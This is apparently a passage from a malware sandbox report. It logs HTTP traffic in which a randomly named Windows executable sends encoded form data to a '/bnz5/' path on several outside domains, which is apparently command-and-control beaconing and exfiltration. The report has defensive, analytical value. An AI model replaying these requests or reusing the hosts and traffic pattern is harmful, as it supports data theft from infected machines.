                                                                                                      Data Ascii: gr=A4aLdhqoOnC+EivCg3C3fM2Do2rRXYQmGzv2j486xSVn3VhIezXLuwhfnPUuadjLjPirMPDQkc2DdDmp4ecMYBDy/pxc2f6s08IE/kVrdGYxkcJBd64y1y0DpVGa56/yFVmDjgkCZFsl+UyzOAISF2ARllXnV2Zb52VvP37kgpsf5enj2oKbJnPy8XcXcvS0K3NGvO6Xc9Nm7+2uaO0Akg5J4t0UWHokmjeln9u19n0mkfGZtD/+R2PkXPqVXNkYzVK9xbm5vqNAQL8bn7cptS0lkbYEAIK+9uSLl6ttfPXpxRz+KJXHD9oGgWDwwxCuWIvb95+iGlGeS1Ut7wcEP29Q2zJO6WTgCCuNMgvvojWMkdWH0cH8o6JpfzBSJlHXwPx/EVHReLDVsjpNrnyfW39FzOTwrS2lheo/JxuWNN8gtChjczeq4NH4jz/aKxCva1ZLNWvRuE9nTShcoTmm5rFPY1DWXO0PTWL9NyfIWhRW/5kU2+2pWKsy3w0C1DSEpb71tBTT075zq7SETKrk9C0tMKRw23P+Qc5d+iqKlxQPh30a4HbGbTKAc3jz2p37hVYyRvlObruDveXxfVekOq+fu+Z/S8HdkngG+n6rXhpjWHWu6W6PszIo1a/tKlZuI2dOJL2T7quyMm8ohK8RXLoHJsmvtYT65RK5tI0P1AoCmhiNWxWEhGEVSvWvqIFk24kDCSXte6Tyww7pyq6jAqb+87PXMfpScA9ueg4RLyEndOABVwBPbM8CMZnDFeGj4waIJSByxXIu7f3fMIRBrP0rjwi5Ekbp8NxA0uEnLsx34Xnz8qNV/j95mvUu+dtSreyHP33n2Cvii5eF3ObjHsM0uOSm9+lJx+kUUkiF1bc9hSHw569OpaNa33P2XZxZ6J4f0v7EL3MeCQiv4z1rVtKE/qUvo5iDOnugJddbeLGAtqQMklqq178Qy0tAz/Rhs6MnX8lKf5h0TLZbBe7mc0C/4jDtxI14ryCD/2FKP4Z+oAhlMTboZ0rsuZzfBOfFbSMqe5sHL0Bz9ezspN5tI7sU/ZWYqlbk00YBOg57DdeFdwGEuCTccek9BstEpLsizt+rMMG7FDMMDubvaBbLBz+QqxPkroHKLavrfqaO9F/s9sNL+W+8hSR//j04Z/bRA3r5jOUNwnPIVKJEXA22LP7bhVm7WNPos0JqL+IFExVs0pQdOpRnWatSXQsCe6ItqTvROE01zf1ci0inFA==
                                                                                                      Apr 16, 2024 12:01:57.338810921 CEST257INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 16 Apr 2024 10:01:57 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      X-Request-Id: c0ef5af0f91691d3631623b4348a82e3
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cb cf ce 06 00 b3 5f a3 e0 03 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 17_0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      40192.168.2.549759103.66.94.182802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:59.827336073 CEST451OUTGET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=N6yreUGrEwmnZyuRuhm7fu2pjjSQdKU6BgmK3dVc5hhl4QdzezeViDhR5sAjVdDUmsLMRcLdrvPdYjLD7b1ZIx3A1Z1l9931wLtzigwrLlFKueBnJaM0qh412Fe43461Qw== HTTP/1.1
                                                                                                      Host: www.ojyphyi.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:02:00.119285107 CEST212INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 16 Apr 2024 10:01:59 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      X-Request-Id: 63808f8d6aad44158681186305f43f6d
                                                                                                      Data Raw: 33 0d 0a 6f 6b 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 3okk0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      41192.168.2.54976091.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:02:26.778486967 CEST709OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.myspinpods.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.myspinpods.com
                                                                                                      Referer: http://www.myspinpods.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 51 48 41 57 32 43 63 2b 34 55 4e 56 71 6b 55 6c 4c 76 35 6c 34 56 4c 6f 63 50 2f 2f 48 51 45 49 74 5a 48 6b 5a 73 66 2b 6f 4f 61 31 46 73 68 69 70 77 66 44 59 78 55 54 6c 6c 42 46 55 2b 53 55 51 4a 69 76 57 50 78 31 54 76 4a 6a 52 38 4e 50 4e 4b 38 6a 4d 5a 69 6a 6e 39 65 61 52 4e 37 34 74 54 69 37 67 45 56 43 6b 42 37 72 57 30 63 52 4a 33 32 59 42 38 42 75 73 4e 71 6c 74 52 72 42 2b 6f 63 69 2f 46 41 34 49 2b 4e 74 30 58 76 73 77 44 51 2f 42 59 4c 45 43 51 73 50 77 62 35 43 52 2b 43 35 73 56 76 68 66 42 65 5a 51 32 4c 53 77 33 6e 61 67 38 34 55 52 50 59 51 55 6d 68 2b 38 41 56 4c 59 53 59 3d
                                                                                                      Data Ascii: gr=QHAW2Cc+4UNVqkUlLv5l4VLocP//HQEItZHkZsf+oOa1FshipwfDYxUTllBFU+SUQJivWPx1TvJjR8NPNK8jMZijn9eaRN74tTi7gEVCkB7rW0cRJ32YB8BusNqltRrB+oci/FA4I+Nt0XvswDQ/BYLECQsPwb5CR+C5sVvhfBeZQ2LSw3nag84URPYQUmh+8AVLYSY=
                                                                                                      Apr 16, 2024 12:02:26.991115093 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:02:26 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      42192.168.2.54976191.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:02:29.510859966 CEST729OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.myspinpods.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.myspinpods.com
                                                                                                      Referer: http://www.myspinpods.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 51 48 41 57 32 43 63 2b 34 55 4e 56 72 41 51 6c 59 63 52 6c 2b 31 4c 72 43 2f 2f 2f 63 41 46 67 74 5a 62 6b 5a 74 71 35 6f 38 2b 31 45 4f 70 69 75 79 37 44 66 78 55 54 38 56 42 63 4b 4f 53 62 51 4a 2b 6e 57 50 64 31 54 76 31 6a 52 34 4a 50 4e 35 55 6b 4b 5a 69 68 75 64 65 59 56 4e 37 34 74 54 69 37 67 45 41 5a 6b 41 54 72 57 45 73 52 49 56 65 5a 50 63 42 74 6b 74 71 6c 37 68 72 46 2b 6f 63 45 2f 45 63 53 49 37 4a 74 30 57 66 73 78 53 51 2b 50 59 4c 43 4d 77 74 72 34 4a 77 35 64 2f 72 31 6e 58 47 77 59 53 48 6e 63 67 6d 34 71 56 76 79 7a 63 55 73 42 63 51 6e 46 57 41 58 6d 6a 46 37 47 46 4f 74 38 74 55 58 39 37 6c 4b 68 34 49 67 77 61 33 78 2f 34 34 4d
                                                                                                      Data Ascii: gr=QHAW2Cc+4UNVrAQlYcRl+1LrC///cAFgtZbkZtq5o8+1EOpiuy7DfxUT8VBcKOSbQJ+nWPd1Tv1jR4JPN5UkKZihudeYVN74tTi7gEAZkATrWEsRIVeZPcBtktql7hrF+ocE/EcSI7Jt0WfsxSQ+PYLCMwtr4Jw5d/r1nXGwYSHncgm4qVvyzcUsBcQnFWAXmjF7GFOt8tUX97lKh4Igwa3x/44M
                                                                                                      Apr 16, 2024 12:02:29.722429037 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:02:29 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      43192.168.2.54976291.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:02:32.247059107 CEST1746OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.myspinpods.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.myspinpods.com
                                                                                                      Referer: http://www.myspinpods.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 51 48 41 57 32 43 63 2b 34 55 4e 56 72 41 51 6c 59 63 52 6c 2b 31 4c 72 43 2f 2f 2f 63 41 46 67 74 5a 62 6b 5a 74 71 35 6f 38 32 31 45 38 52 69 75 54 37 44 65 78 55 54 30 31 42 42 4b 4f 53 43 51 4a 32 64 57 50 68 50 54 71 35 6a 52 64 64 50 50 49 55 6b 5a 35 69 68 73 64 65 5a 52 4e 36 69 74 54 79 2f 67 45 51 5a 6b 41 54 72 57 43 6f 52 4f 48 32 5a 43 38 42 75 73 4e 71 35 74 52 71 53 2b 6f 56 2f 2f 45 70 6c 49 76 39 74 31 32 50 73 32 67 6f 2b 44 59 4c 41 4c 77 74 7a 34 4a 73 6d 64 2f 6d 45 6e 58 66 6e 59 53 2f 6e 65 55 58 34 35 77 50 4f 69 4f 41 4f 52 4e 59 35 66 41 4d 79 6f 43 56 48 47 58 4b 74 38 66 6b 70 79 74 4e 4d 68 71 49 6c 6d 76 2f 63 77 2b 78 39 7a 4b 30 66 75 66 6c 68 75 72 68 6d 78 35 61 41 74 42 33 45 72 75 52 4d 78 62 57 41 68 65 4b 4e 43 76 66 4b 4e 2b 4f 4a 30 49 73 4a 31 68 4c 4c 68 35 66 53 36 36 2f 43 55 55 56 48 4f 47 6c 31 30 4a 51 77 2b 2b 53 48 33 52 67 6b 66 45 63 46 48 4d 4b 65 32 39 34 6a 76 37 6b 58 46 4a 6e 53 38 66 66 41 58 58 73 71 35 67 56 78 55 51 4e 41 72 79 43 6e 67 30 50 6c 75 43 61 54 53 61 71 77 7a 57 45 52 62 78 55 35 48 36 46 58 4a 4f 30 50 66 34 32 36 36 32 6e 64 43 69 67 47 37 53 50 2b 63 77 47 7a 55 66 32 73 6c 61 4e 67 38 58 30 2b 73 73 2f 43 69 53 75 76 30 2f 61 76 4d 51 4e 72 52 71 46 65 76 39 48 2b 59 63 69 70 59 53 51 47 49 64 47 55 2b 52 43 34 75 50 67 55 6f 44 4e 4b 63 5a 62 34 33 75 51 6b 76 38 64 35 34 6e 6d 75 44 56 42 4e 62 52 65 41 51 6d 67 2f 4e 6e 5a 72 4f 54 39 48 34 63 54 6d 2f 78 41 58 68 79 4e 39 4f 6d 58 41 73 72 65 6a 4b 47 6e 66 4f 6f 46 48 73 36 78 36 79 47 71 4f 31 45 64 68 37 70 4a 67 6b 32 51 65 71 52 59 73 57 4f 2f 6c 4c 75 4f 48 32 74 61 79 63 34 6e 56 71 30 59 2f 47 59 45 6a 47 50 4d 73 51 53 72 66 71 72 31 70 52 51 48 38 69 54 7a 31 39 74 35 46 2f 33 42 5a 6d 32 38 42 75 78 51 44 38 35 45 2f 43 43 37 53 50 56 6f 4e 48 54 2f 4b 52 72 41 52 58 50 62 72 6e 44 6d 52 4e 54 4f 30 35 54 44 57 56 67 50 6a 47 45 63 47 4b 54 4c 64 72 32 69 45 6f 42 55 69 32 56 79 41 71 49 2b 77 57 42 6e 43 77 45 52 4b 4e 66 34 78 45 69 38 41 71 4f 50 5a 6d 4c 31 66 50 6a 70 68 41 31 4e 34 53 56 50 6a 6b 72 37 4f 47 41 64 4b 71 46 4b 6b 73 71 2b 66 66 71 45 4c 63 78 6c 54 42 75 30 4e 6b 59 4d 43 65 48 79 55 69 7a 79 6b 2f 6e 6d 6e 5a 73 79 72 52 4a 76 56 59 38 69 70 37 73 4c 6b 4f 77 4e 4b 37 72 51 74 74 6a 4e 37 6d 72 4e 4f 71 45 73 7a 33 5a 73 43 4d 41 32 33 6f 46 68 35 4b 35 42 4a 66 6e 63 57 54 2f 79 31 58 64 78 78 51 42 77 62 6a 2b 62 2b 62 63 78 46 7a 70 4d 42 63 65 72 76 6e 45 5a 42 4a 6e 53 73 55 61 62 7a 2f 4e 79 6d 49 57 76 43 42 34 69 46 2f 62 75 72 56 68 43 6a 37 61 52 55 6b 67 6d 36 50 44 63 52 34 78 4a 55 7a 31 58 43 75 62 39 39 56 38 36 33 4f 67 47 74 6b 49 35 50 2b 6e 6e 63 46 6c 6f 72 6e 2b 70 43 46 6f 41 4a 68 4e 65 41 5a 48 4b 4a 2b 50 4f 54 2b 47 6e 57 6e 46 39 73 48 6a 31 70 39 52 54 41 73 50 78 44 72 4f 47 55 2b 6e 4b 4d 77 61 65 51 45 68 30 56 46 53 68 42 6f 37 50 7a 4b 4d 69 43 42 64 57 57 55 73 30 53 6b 6d 7a 41 51 70 6b 73 76 47 61 38 4d 68 4e 54 73 2f 78 43 53 67 69 39 76 75 4a 44 48 32 66 31 36 45 73 43 51 68 4a 59 56 2b 52 6b 6d 58 44 59 34 49 6e 43 39 4c 53 39 34 4a 47 2b 51 6b 2b 6b 65 32 63 5a 49 77 42 65 64 31 37 4b 41 64 2f 42 4a 74 4f 42 6b 64 73 67 54 7a 41 36 35 67 54 4d 68 39 63 32 33 75 73 39 79 42 58 58 35 67 6c 53 4f 2f 62 34 30 73 79 49 71 30 67 56 35 6a 54 64 32 42 4c 33 4e 45 4d 70 4f 75 71 61 75 4e 32 42 30 72 76 7a 50 52 65 59 68 4d 50 5a 5a 54 36 44 4b 79 33 39 54 58 66 7a 53 6b 76 4a 62 4b 43 54 4a 78 4a 73 39 63 4c 5a 66 76 59 33 70 56 46 58 66 69 6d 57 6a 6a 5a 45 49 46 6e 66 53 45 44 70 70 63 6d 2b 58 75 50 35 35 43 4b 6d 77 61 5a 39 6a 78 69 58 4a 5a 79 66 4c 70 63 36 32 4f 4e 4e 2f 33 2f 6b 6f 6e 6d 70 41 39 69 33 4a 43 6f 44 69 52 37 49 62 41 3d 3d
                                                                                                      Data Ascii: gr=QHAW2Cc+4UNVrAQlYcRl+1LrC///cAFgtZbkZtq5o821E8RiuT7DexUT01BBKOSCQJ2dWPhPTq5jRddPPIUkZ5ihsdeZRN6itTy/gEQZkATrWCoROH2ZC8BusNq5tRqS+oV//EplIv9t12Ps2go+DYLALwtz4Jsmd/mEnXfnYS/neUX45wPOiOAORNY5fAMyoCVHGXKt8fkpytNMhqIlmv/cw+x9zK0fuflhurhmx5aAtB3EruRMxbWAheKNCvfKN+OJ0IsJ1hLLh5fS66/CUUVHOGl10JQw++SH3RgkfEcFHMKe294jv7kXFJnS8ffAXXsq5gVxUQNAryCng0PluCaTSaqwzWERbxU5H6FXJO0Pf42662ndCigG7SP+cwGzUf2slaNg8X0+ss/CiSuv0/avMQNrRqFev9H+YcipYSQGIdGU+RC4uPgUoDNKcZb43uQkv8d54nmuDVBNbReAQmg/NnZrOT9H4cTm/xAXhyN9OmXAsrejKGnfOoFHs6x6yGqO1Edh7pJgk2QeqRYsWO/lLuOH2tayc4nVq0Y/GYEjGPMsQSrfqr1pRQH8iTz19t5F/3BZm28BuxQD85E/CC7SPVoNHT/KRrARXPbrnDmRNTO05TDWVgPjGEcGKTLdr2iEoBUi2VyAqI+wWBnCwERKNf4xEi8AqOPZmL1fPjphA1N4SVPjkr7OGAdKqFKksq+ffqELcxlTBu0NkYMCeHyUizyk/nmnZsyrRJvVY8ip7sLkOwNK7rQttjN7mrNOqEsz3ZsCMA23oFh5K5BJfncWT/y1XdxxQBwbj+b+bcxFzpMBcervnEZBJnSsUabz/NymIWvCB4iF/burVhCj7aRUkgm6PDcR4xJUz1XCub99V863OgGtkI5P+nncFlorn+pCFoAJhNeAZHKJ+POT+GnWnF9sHj1p9RTAsPxDrOGU+nKMwaeQEh0VFShBo7PzKMiCBdWWUs0SkmzAQpksvGa8MhNTs/xCSgi9vuJDH2f16EsCQhJYV+RkmXDY4InC9LS94JG+Qk+ke2cZIwBed17KAd/BJtOBkdsgTzA65gTMh9c23us9yBXX5glSO/b40syIq0gV5jTd2BL3NEMpOuqauN2B0rvzPReYhMPZZT6DKy39TXfzSkvJbKCTJxJs9cLZfvY3pVFXfimWjjZEIFnfSEDppcm+XuP55CKmwaZ9jxiXJZyfLpc62ONN/3/konmpA9i3JCoDiR7IbA==
                                                                                                      Apr 16, 2024 12:02:32.458324909 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:02:32 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      44192.168.2.54976391.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:02:34.981544018 CEST450OUTGET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=dFo211Ya6GQqvQphJd5Z9kXpbZuBKAdHlLq9NOD/jOOiJZxFh2qZdwUu6l5GM/Gcb7yTWO1JQ6ZPaNdZMdh+co6vneivRci+mW27rS4RiRuWVEkpVXbIIudDxuuJlDWajg== HTTP/1.1
                                                                                                      Host: www.myspinpods.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
